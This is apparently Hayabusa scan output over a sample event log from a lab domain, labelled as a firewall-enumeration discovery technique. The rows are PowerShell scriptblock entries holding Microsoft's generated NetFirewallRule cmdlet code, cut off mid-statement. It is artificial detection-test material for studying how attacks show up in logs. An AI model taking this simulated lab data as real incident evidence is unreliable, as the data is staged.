$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 